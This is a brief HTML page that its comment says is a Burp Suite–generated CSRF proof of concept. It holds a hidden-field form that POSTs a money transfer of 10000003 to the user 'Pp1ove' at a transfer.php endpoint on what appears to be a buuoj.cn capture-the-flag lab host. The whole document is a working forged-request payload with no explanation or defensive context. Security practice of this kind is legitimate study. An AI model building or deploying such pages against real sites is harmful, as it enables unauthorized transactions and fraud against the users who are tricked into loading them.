<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://c954568d-9c91-4ec8-a1e5-850674a62021.node3.buuoj.cn/transfer.php" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="target" value="Pp1ove" />
      <input type="hidden" name="money" value="10000003" />
      <input type="hidden" name="messages" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>